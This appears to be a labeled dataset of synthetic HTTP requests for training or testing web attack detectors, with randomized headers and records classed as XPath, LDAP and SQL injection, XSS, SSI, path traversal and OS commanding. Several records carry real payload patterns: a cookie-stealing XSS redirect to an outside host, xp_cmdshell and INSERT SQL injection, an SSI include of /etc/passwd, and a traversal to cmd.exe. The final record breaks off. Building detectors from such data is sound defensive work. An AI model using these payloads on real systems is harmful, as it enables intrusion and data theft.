GET /mtfY0@_/heQeval7Pg@optVOfcD/iijmehtseyyS4t/yRI8HqA73e.shtml?0DgafljPEPYchild=79922654&ftf6AtaomroU=a&esagedR6=ciotandf0arcmdr%7Ed+Z%3C&taywteorn45=lae0Oso3ui&ilie=OR+++%27pInL%27++++IN++%28%27%27++%29&pbelikeOo=YmapmaocrespdQ&zk@u4O.UHCWx=dnishutdownutni0df%3DesjZca&4woI=tdw%26uUtun HTTP/1.0
Host: 146.52.115.235
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8, iso-10646-ucs-2, iso-8859-2
Accept-Encoding: 
Accept-Language: pah8en-3late, ss-0, pu-lshmRy7, cru2siej-rRrqOgmt;q=0.8, te-ld
Cache-Control: no-cache
Client-ip: 247.223.116.97
Cookie: syebryfS2eyesl=5686346825;geeiu=gi;mitodppiasxi2f=it9pMzevn2hsiodfy1;nne=841811
Cookie2: $Version="29"
Date: Fri, 07 Sep 07 19:01:30 UTC
ETag: "osdX6lLH@4A8bU-Sr0"
Expect: duapjRis=awoeo;l1m7=3t6n
From: ohztf@hhetact.fr
If-Modified-Since: Fri, 08 Oct 04 03:59:44 GMT
If-Unmodified-Since: Fri, 06 Aug 04 01:23:40 GMT
If-Match: "Eq8NSJDwH0wz571XnYqI"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 607
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: oaihl AEnmn=htiils
Range: -30216,36258-
Referer: /rNrxmh/Tenn6e.jsp
TE: trailers,trailers
Trailer: If-Match
User-Agent: s9.OaSX http://www.nnefoeni.be
UA-CPU: Sparc
UA-Disp: 3369,6494,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 2.5 160.198.150.9, s6sIhc/0.6 214.98.136.146
Transfer-Encoding: deflate
Upgrade: satc/9.3, dlwu/4.3, ras/0.6, hmrcOE/0.0
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 123.169.83.240
X-Serial-Number: 653794992925901
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35212
Start - Id: 48441
class: XPathInjection
GET /fFNCjdMQcDkrlO4rFyE/Civcd0pTetisiedA/tNeM36xU8G8_Fxx/yuzQgu@N5f3Jet81/Ttesa7e0rcTldpiure/g.8D6_ZA8bzbkm24mm9X/1lgY4ZnHckFwannN/CRQ73hcsH@IAp/aEYqKkv0P10o1iZr8--/Lentosa/aG/qHf.jpg? HTTP/1.0
Host: www.aj1Fq.biz
Connection: close
Accept: text/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: Ni-8fc;q=0.9
Cache-Control: y='iotGg'
Client-ip: 253.198.26.52
Cookie: iaaNYarwscmo8=t@W5;srTE9e=rsn4ht']     |   P   |   //user[    name/text( )  =  't8a;ypdawA67yvsecw=sz5myY
Cookie2: $Version="0"
Date: Sun, 15 Jun 08 05:38:33 GMT
ETag: "QF5oOBRPWk@R1BG"
Expect: sidisrac=pr0iinnu;51o4t
From: tzeeyyn@tbckkmdmi.st
If-Modified-Since: Wed, 26 Sep 07 03:08:09 GMT
If-Unmodified-Since: Thu, 18 Oct 07 22:48:24 CET
If-Match: ".D8xdomO_8a34dG"
If-None-Match: "Ui3nsCwo4SRJGXS"
If-Range: Thu, 08 Jan 04 06:26:55 CET
Max-Forwards: 9
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: csh5 e7oha=vom3a6n0
Authorization: Digest nonce
Range: 91336-,-23681,1-84677
Referer: http://www.xrsavu.gov/ea8e/rnfr.cgi
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (X11; U; Open BSD i386 3.5; tc-iA; rv:0.8.6) Gecko/64143805
UA-Disp: 5730,379,8
UA-OS: Win95
UA-Pixels: 348x583
Via: shxoe/7.5 200.185.244.54, 6.4 www.adnr9otS.tiff, tsh/5.4 97.188.228.2:95
Transfer-Encoding: identity
Upgrade: On7s/8.1, tyoz/0.4, mssy/6.5, iod/0.2, tor/9.7
Warning: 810 www.r8tfa.html "9eupeieelbhiq8etsrA" 
X-Forwarded-For: 152.33.64.46
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48441
Start - Id: 37049
class: LdapInjection
GET /ndHIvwn.ro2.jpg?Ter=7251521065&kl7oigniirfa=et%29%28+%7C++%28xo%3D*%29&erlauIeSba=delete7erEieeoalhsehyhaving&hsadtderbspl=oRcs1_&q3Q00aJkA=inclrttctssS&M1WzYOZ5pA=e%2Fg&rutmrsrodah=meec&pprocessing-instruction6MK=075324397 HTTP/1.0
Host: www.lidcl.com
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew;q=0.5, cp-936
Accept-Encoding: *;q=0.7
Accept-Language: a-8;q=0.8, nfninih-ysawumm;q=0.2, l-68;q=0.4, g0adt-rkt0ed58;q=0.9, gNmdot-h5chw
Cache-Control: no-store
Client-ip: 128.25.71.85
Cookie: stdLdeoovA=27ySwu;aaldnl=<3eoH<aa8N&
Cookie2: $Version="4"
Date: Tue, 05 Apr 05 06:47:58 UTC
ETag: W/"xP01R0mA2ItUR3q4"
Expect: 100-continue
From: ibiyuSf@istTee.cz
If-Modified-Since: Fri, 07 Aug 09 20:36:45 GMT
If-Unmodified-Since: Wed, 20 Feb 08 05:37:29 UTC
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: *
If-Range: "nFLIjUeH7XGYUQ1pvTi"
Max-Forwards: 23
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 5i2re 1lveu=8spaotso
Range: 0495-,7886-,01366-498382
Referer: http://ipanmiHu.com/dz4esh.cfm
TE: deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.3 (Windows; U; Win98 9.8; Re-ab; rv:4.7.7) Gecko/90814205
UA-CPU: 68000
UA-Disp: 922,7603,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 902x8405
Via: 8.8 www.foUao.jpeg
Transfer-Encoding: identity
Upgrade: nopuat/4.5
Warning: 722 60.238.142.91:0 "bhsRneTrnvR4cnsrez" 
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37049
Start - Id: 46761
class: XSS
PUT /rrnentt/iicsyeiethui/7Z5cv4HhttpjITElcO/erIeRS/bdiiu/iaqktwPdsnhecntdn/fsihoeltoabsoeh2cdj2/afAo7sz/eeh/sAi/tV_AX_gV/n5uoaiejh6.asmx? HTTP/1.0
Content-Length: 409
Content-Language: ldsooe
Content-Encoding: compress
Content-Location: http://www.elIRsn.de/olqTlao/te5pmNpl/kntestql/elgctets/8ciCo.dll
Content-MD5: eWV5b3NrdDltaGxudk5sYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Aug 09 17:16:15 CET
Last-Modified: Mon, 04 Jan 10 24:32:48 CET
Host: www.iIauee.be
Connection: qdmir
Accept: */*;q=0.2
Accept-Charset: cp-936, windows-874;q=0.8, windows-1254, shift_jis
Accept-Encoding: identity;q=0.0, deflate;q=0.2, identity, gzip;q=0.4, deflate
Accept-Language: eec-ccypb5o, ezh-llset;q=0.7, osc-6xry8cL
Cache-Control: no-store
Date: Tue, 03 Oct 06 16:34:35 GMT
ETag: "B0iVQ@MY.m4Tm6IrmFt"
Expect: tnqid
If-Modified-Since: Thu, 31 May 07 21:50:24 GMT
If-Unmodified-Since: Sun, 25 Feb 07 04:45:13 CET
If-Match: "tYiG6bRX64KZDMuXh"
If-None-Match: "cVWUYV5JmqcW8Tvvvz"
If-Range: *
Max-Forwards: 83
Pragma: no-cache
Proxy-Authorization: Basic Z212dGU6ZXJyZWRkZQ==
Referer: /EtsSnra/ttsamu/bucxamee/bYYse.html
TE: gzip;q=0.8,trailers,gzip
User-Agent: beporwpee
UA-Color: color32
UA-Pixels: 1199x1516
Transfer-Encoding: identity
Warning: 169 130.84.60.97 "veojxxdsnqtnotxti" "Sat, 18 Mar 06 20:44:29 GMT"

di=rearneoLNaenmme&IxmZzl56U9H6=syEgd&dqdl=rYd_j&50-yGdhome1Qp=ot\eu&snxpQi=0ere&tcraLtoOrunczid=98&pgri3Sagea=5onsvzcl7gtb&7ealttaieit=0134057873&aoz2keS=<xml  id    =  "   X" ><a   ><b   >&lt;script>[document.location.replace   ('http://www.setanave.com/cgi-bin/veelve.cgi'+document.cookie);]&lt;/script    >;</b  ></a  ></xml>

End - Id: 46761
Start - Id: 40999
class: SqlInjection
POST /4xYeqhf2Bhtpass/aXE/ooRYIo-BlDs05fGhl3..php4? HTTP/1.0
Content-Length: 316
Content-Language: ae,Pdeoe,edyedmc
Content-Encoding: identity
Content-Location: http://top6jr2u.org/hCea1.jsp
Content-MD5: bXd4YzhrcDE0c25lb2RyOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 19 Aug 06 01:54:52 UTC
Last-Modified: Wed, 21 Mar 07 22:41:58 CET
Host: 189.217.133.163
Connection: keep-alive
Accept: application/*;q=0.9, image/jpeg;q=0.8
Accept-Charset: koi8-r;q=0.5, iso-2022-jp;q=0.1, iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.11.222.202
Cookie: untrhuslrdea=c085tioe3htser;adctx=ge;.THuudkBT@L=wkiusrIb;arhaastsuNv=ejLP9PX_F-f9
Cookie2: $Version="889"
Date: Tue, 18 Jan 05 11:59:50 UTC
ETag: "vXvN5UnvPs4m@hSmv5"
Expect: 100-continue
From: syMege@l8wshrfu.st
If-Modified-Since: Fri, 06 Oct 06 09:10:21 CET
If-Unmodified-Since: Sat, 01 May 04 21:34:38 CET
If-Match: *
If-None-Match: "bDO56@3M8lka6z_p-mb"
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 975
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: /ceprsiir/hsoczooI.swf
TE: chunked;q=0.5,trailers
Trailer: Accept-Charset
User-Agent: esnddg/3.7.3.3
UA-Pixels: 892x2342
Via: 9.5 211.185.137.236
Transfer-Encoding: gzip
X-Forwarded-For: 181.40.75.124

lt=naccess_lognodeoT6~Tdrehiae&aioi4arage=exec   xp_cmdshell   '"c6ibk4tne"  >> script.vbs'&cc=lGC&7boreore=5324808&asmlweiyTli=oRnC&10aOFh33jg=EwF6fo1nlTss&l3e15AfseHsa=stylesslwnUErtskeg&@YSAdropU43m4og=704&knime2etninreda=eropSoc6o2k&lTbwZo=aeb7ad-asQolog5o&atMoef=ctyA&sn=498626&teSf1=sor4lqto3lswV

End - Id: 40999
Start - Id: 39605
class: SSI
GET /uiiGse/lMHb/rsVineaolx/axui/tFo0hsh/j24d/itzchn/O.8AJZTXyservicesX@dletc.jpg?tbfHnofsav3a31t=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E HTTP/1.0
Host: 24.228.62.39:484
Connection: keep-alive
Accept: text/xml;q=0.6
Accept-Charset: koi8;q=0.7, iso-8859-2, euc-tw;q=0.7, ks_c_5601-1987, windows-1251;q=0.0
Accept-Encoding: identity;q=0.7, compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 239.19.170.214
Cookie: ttyaE4wjf=7145163518;oklike4Mshutdown9w=8;ueaoqQ0seOibemt=eCecQQyDU
Cookie2: $Version="067"
Date: Mon, 07 Mar 05 20:56:51 CET
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: nuEdWa
From: k4wcg@aEdi7a2.de
If-Modified-Since: Mon, 09 Feb 09 20:40:47 UTC
If-Unmodified-Since: Sun, 18 Apr 10 09:30:08 GMT
If-Match: *
If-None-Match: "7K6CkfYWjKe4J5vA"
If-Range: *
Max-Forwards: 0481
MIME-Version: 2.2
Pragma: ot3i=cigp9q
Proxy-Authorization: Basic a0k3bm9tOm5yYTg=
Authorization: NTLM aWlzaW5oY3M1cnFuY3ZVbWE0T3R0aWU2b2p0OXRpcmU5aTh3bGFiaWFoZWk=
Range: 5591-,251722-40474
Referer: http://www.ndiey.com/sd6xj/uadt/heao/Spt74i.swf
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/8.4 (X11; U; Unix 6.4; st-ht; rv:1.5.8) Gecko/37453024
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 0.8 73.60.218.107, 0.5 www.Weiidih.htm
Transfer-Encoding: lpeitb
Upgrade: blrDl/9.7, eie/1.2, i9hq4/7.4
Warning: 456 21.250.60.163 "ojaOt3inIin" "Sun, 24 Jul 05 04:29:49 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 51537032626
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 39605
Start - Id: 44898
class: PathTransversal
GET /twuloxtoisuhsojY/mnldt0/IlfwnavaElEtgitMl/ovul4K/ee3FljL_uJMZ6B59q/OK.mdb?_orEchttplocation=thcshtpassfuFSboot.inio&osg=ihrj&pboot.ini2W-4E2C=3sonRir&ao2g2oevsrMira=2ifsncatmin%7Cb&QWI9Q=h%3Fe&T5cdeyn=file%3A%2F%2F%2Fe%3A%2Fryt%2Faov%2Fi6eunm5s.xml HTTP/1.1
Host: 59.112.78.251:41
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nptiodos-ts;q=0.5, f2e-se;q=0.6
Cache-Control: no-transform
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="65"
Date: Sat, 07 Jan 06 24:17:22 CET
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: s0deb=TEis;b9a59a
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sun, 07 Nov 04 10:53:25 CET
If-Unmodified-Since: Sat, 16 Oct 04 03:34:08 CET
If-Match: *
If-None-Match: "SGgE56gmVyThjgVd"
If-Range: *
Max-Forwards: 7
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest realm
Range: 78821-,-584,26-7
Referer: /lxaIlit.htm
TE: deflate,deflate,chunked;q=0.1
Trailer: Transfer-Encoding
User-Agent: egvdObub5 http://www.aafzrd.de
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6797x3315
Via: 0.3 www.The12Xc.jpg:85322, 4.8 178.39.25.174, 1.1 www.bazhyraL.html
Transfer-Encoding: gzip
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 647 www.4rtd.shtml "hrxe" "Sat, 11 Oct 08 22:03:34 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44898
Start - Id: 41535
class: SqlInjection
PUT /juE/cuelaaoohnbhtm/ntrz/OLmx/tigqXZfHR9@dMDPI/efwdr-KmX7y/chxoKl-U_/0acI11ioscriptDuv8b.dll? HTTP/1.1
Content-Length: 350
Content-Language: dTE
Content-Encoding: compress
Content-Location: /obunn/tonTso.swf
Content-MD5: d3R0aG1kYWNiZXJveFNibg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jul 04 08:26:51 UTC
Last-Modified: Thu, 12 Jun 08 08:40:27 GMT
Host: www.etacr7.de
Connection: keep-alive
Accept: application/*, image/jpeg;q=0.1, audio/*
Accept-Charset: iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=2105
Client-ip: 124.86.136.28
Cookie: rcrgE9194i=9807713;rys02iwX=lulri3nrh48
Cookie2: $Version="111"
Date: Tue, 23 Jun 09 02:58:59 CET
ETag: W/"PqTaCJxgsAvQFa_UT"
Expect: 100-continue
From: htsmyA@nheod.it
If-Unmodified-Since: Sat, 22 Jul 06 21:33:33 GMT
If-Match: "e-3JuNHjXHkT067tBD"
If-None-Match: *
If-Range: Tue, 30 Oct 07 20:48:38 CET
Max-Forwards: 546
Authorization: NTLM c3FvcmRmZWljb3ltZUF4VGF1bWloc2lkaG9OaG50bWhl
Referer: /wytphn/d5Oew/nta8i/rutixSs.fgf
TE: trailers,deflate,trailers
User-Agent: zinaAic/0.8
UA-OS: Windows 98
UA-Color: color8
Via: 1.9 www.opea.tiff
Transfer-Encoding: deflate
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5

Agd8.Hxp_tv=j&usfesyesdesnk=renndpez8h&etekgse=te&vWlocationpShttpzS=869&pwau=mnt2&services_ViLLYshutdowns6-=568&aetyrAyrssrsel=501&zenrwhelei=twn4sfim&7cnpihtow=OrigText'OR'msl4b9'=    'cEiSeon'&re0DWQRRB9o=wzi6ded1smtatinaO&QRTfSAWa=delete/ Ehxocihto k~sdT&arzePkt1=4u3ebko&meaivsdnoe=7634338934&osnR6IsenSohoo=eA3mZbEJOE&0a0oQ=4045

End - Id: 41535
Start - Id: 36867
class: LdapInjection
GET /ceqTdfeio/Hj0n4c/l6eptr4teRct/rmfwMXDsXhFSi/b52Pq4/tJ_6WEZ7d/podjbycot/ylveitdiObso/n8teBTsLlsci/nTeotk/v2YXeF@yc@atvs/9jS5WucOMBIp.png?oin=y4amhfopen-sAperl2stdintto&LLa0HDi=qloDog4&emyi3isfe=5815409519&em=aiaoze45rp%40 HTTP/1.0
Host: www.4ctelar.net:17
Connection: vmocz
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: et)(| (De=*)
Accept-Language: *
Cache-Control: no-cache
Cookie: daist8psnaoe=nn+oe  tstylean;M2m=633965320
Cookie2: $Version="178"
Date: Mon, 20 Mar 06 21:16:44 GMT
ETag: "T30brrwlJ-MlcN4@"
From: Ecpb@orxe.ch
If-Modified-Since: Sun, 29 Aug 04 19:27:20 GMT
If-Unmodified-Since: Sun, 08 Oct 06 12:29:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6705
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: nNZHod ya5p=awun
Authorization: NTLM dHBobFRydGRib3Zyc25jc3RzeGIwbWRzb2VyMXJobmlpeXNhbG1zb2hoYVc4ckQ=
Referer: http://vomts60.com/0thege2t/li9rrde/tttidei/lkwaU.asp
User-Agent: 3Srr0dsevw
UA-Disp: 8264,339,8
Via: FTP/5.8 www.xaZ1R.png, ieao/3.9 167.138.251.230:8714
Upgrade: hAayi/6.8, sest/5.4, shiokr/0.2, jie6E/3.0
X-Serial-Number: 310795223019
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36867
Start - Id: 41485
class: SqlInjection
PUT /sEJS70k3q/sjeheLfhlnoip/wwX/oothsrh9he/access_logifWd4G4wfPwhere/TnmEa/vkkwhttps2P7UB8hcU/snsLj/saoy5daadehi.cgi? HTTP/1.1
Content-Length: 238
Content-Language: ax,r3Lq,RI
Content-Encoding: identity
Content-Location: http://cEte.uk/e6Oe9t1e/unre0si/mars/pu0nai.msf
Content-MD5: c2loMnRoYXJ0dXFveWVyUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Wed, 23 Nov 05 10:33:14 CET
Host: 56.23.175.58
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.139.149.146
Cookie: mfrnoee=31778785;poelecl5Bs=nfer9Ld;rldbb=92389;mdeNuIoiwA=wn3o1motzsbswr;orne2iere0dVs=752141
Cookie2: $Version="203"
Date: Sun, 15 Nov 09 17:27:59 GMT
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: Elsne=gtutm2rl;tasr
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Thu, 08 Apr 04 16:07:46 CET
If-Unmodified-Since: Wed, 02 Jan 08 14:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 9521
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: NTLM bXNzdWV5cHVKcjY3ZXRzOGhpNzNpbmtkbDdudUFyY1V0Y2plbDNPdHhhdmk=
Range: 78-403185
Referer: /nuIwell.jsp
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: e5r._1B http://www.scitaaes.gov
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: HTTP/1.2 www.ixEEauc.html:378, 2.2 www.qEtble.gif
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

anNhrieJiloc=mrtzhtgr1l&rnh4irol=c@&xmlnp8haoo6gb6&dksanriexb=5&2hTp2=528235618&ldeyu7rtse=zrH3Z&laqwqoyoam=; EXEC(    'INS'+'ERT   INTO   users     values(454,'erhWegtRhm','oreSH' ))&znitdnoeHayRass=B]

End - Id: 41485
Start - Id: 37208
class: LdapInjection
GET /axOGkperld_URqfvI/83/kemunair1.mspx?cmdiFTe8Oo=%3Egg%5Cnq%26rs&deregrmoe=emoarhendttz0&T69znm=sloz%3AfieEatusr&ULeE=%29++++%28+%7C++%28displayName%3Dhad*%29+%28name++++%3D++++had*+++%29%28+mail%3Dhad*+%29&xynRedfnXNEndar=7272790&eEorepnh1u=7&zmota4c8mias2Bs=8&2cinserthttpKbin2zGMvG=pd7sh0meini&oeTn=iqaisoee&ad=6930&glfea5u09rrp=home%2Bbgsoundhedn HTTP/1.0
Host: 139.170.245.2
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.5
Accept-Encoding: identity, identity;q=0.2
Accept-Language: *;q=0.6
Cache-Control: max-age=96735
Client-ip: 98.210.207.217
Cookie: swFvosbesmm=8taoercpsmeeit;dkc=0410525
Cookie2: $Version="43"
Date: Mon, 15 Mar 10 05:08:27 GMT
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Mon, 26 Jan 04 21:19:33 UTC
If-Match: *
If-None-Match: "l8o8XG_Hq8otMWC"
If-Range: Sun, 08 Jun 08 10:35:19 GMT
Max-Forwards: 6089
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: wEne ojRSaei=oicss9
Range: 605-286224
Referer: http://so5t.be/foPhfS.swf
TE: deflate,gzip,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/7.5 (X11; U; Linux i586 4.9; as-Wr; rv:3.9.8) Gecko/18416664
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x8291
Via: 4.7 145.113.86.153
Transfer-Encoding: y6RE; asg5=ntblc7a
Upgrade: kfhrs/1.9, veboem/8.5
Warning: 831 www.3uaaedte.jpg "Tszrxr" 
X-Forwarded-For: 209.47.70.154
X-Serial-Number: 973297601016037015
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37208
Start - Id: 41463
class: SqlInjection
PUT /Grfdoiae/oAIETTi1.uOz/j3smye/ris45m1ieielgi/smuitHrohibsiLe/rNnaPL/nwzDcT7Aenl0b4/qv.asmx? HTTP/1.0
Content-Length: 270
Content-Language: nw9nt,Jl9ketfs,az
Content-Encoding: compress
Content-Location: /hhaiuti.bin
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Oct 09 14:48:47 GMT
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: 165.14.197.64
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis;q=0.3, x-mac-turkish
Accept-Encoding: deflate;q=0.4, deflate;q=0.7, compress, gzip, gzip;q=0.4
Accept-Language: ecgp-tde3ig, DhtE-1pcr;q=0.5
Cache-Control: esyaocee='8'
Client-ip: 131.147.44.241
Cookie: hev=12282;Yh0bc=3;ct9=sr9u>;LsstoLZrtosbpdr=3;rm=9bainljietaldss;aqy=i zes?eacz egijr6p
Cookie2: $Version="83"
Date: Mon, 09 Aug 04 13:49:37 UTC
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Thu, 04 Aug 05 03:44:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 2.7
Pragma: m=enOahsq
Proxy-Authorization: Basic aGYzaWVvOkZhbGxrcw==
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: /9cwiae6e/i4uAig/tzdedrn/D7rsEs.pl
TE: trailers,deflate;q=0.4,trailers
Trailer: Range
User-Agent: nobc6d2ltoLtrSmmcsk
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: 7.0 215.41.236.18
Transfer-Encoding: gzip
Upgrade: EorNU/7.3, mot/1.8
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

2ahcrpiaOsn=e&.rIWhavingU@LDrYB=d%29uGESdl0sd%3Eioaeannw&oitlggiigo3z=honas&gp6LX-21asystem%u=427210&3ZtQ-cmailh13U=a1R&lLnisiny=enUreTo_pc&ia3ecdnareanue6=OR++%27wetd%27+++++BETWEEN++%27R%27++AND+++%27T%27&fir2AdtEe1=e4DEGS3t&osos8A5UtOuFsko=e%29fmrmpeemysej%25nseau%7C

End - Id: 41463
Start - Id: 38419
class: LdapInjection
GET /ghXJJLgxvb.UkQ/tHeObufon3ANjG8eOJaE/hqOeiraL/-csam.ZteLwhere/mqdlr-svZ1yQRcK15i/ho/-AEyF.cGCk/I_l/fcR.swf?elSphr=n&ttewnrtgRb=bih%29%28++%7C%28ahnfa%3D*%29 HTTP/1.1
Host: www.rpEs.biz
Connection: NemUefi
Accept: audio/*, audio/x-wav;q=0.2
Accept-Charset: euc-cn, iso-8859-15, iso-8859-7
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: *;q=0.2
Cache-Control: max-age=6
Client-ip: 169.13.143.24
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="88"
Date: Wed, 29 Mar 06 06:30:18 CET
ETag: "inlhojR2ct_58MrdgM"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Wed, 21 Jan 09 05:13:47 GMT
If-Unmodified-Since: Thu, 17 Jun 04 10:28:18 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: *
If-Range: Tue, 02 Jan 07 23:11:52 CET
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: s=enaetot
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: 5haicz v8e4hrd=leeaos
Range: -96373
Referer: /lr7rHa/87ev/3aigmo/rhlgsru/cta1Is.nsf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: mUos/5.1.5
UA-CPU: MIPS
UA-Disp: 461,871,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: 6.9 www.eprdebl.png, FTP/4.8 www.slnnrr.png
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38419
Start - Id: 44270
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 65.48.90.114
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.4, x-mac-ce
Accept-Encoding: *;q=0.5
Accept-Language: cht-tr;q=0.5, 5ro-rtdr0meo;q=0.2, tg6eepm7-rthpop;q=0.7
Cache-Control: max-age=834
Client-ip: 208.204.2.15
Cookie: teanhoiwed=waoY;ornitCtihoeelar=c0;kotw3oeGtuEsnci=w.q;r4eag=9pHDM-We7W
Cookie2: $Version="544"
Date: Tue, 16 Mar 04 01:17:27 GMT
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: iefdsb@2Nyh.org
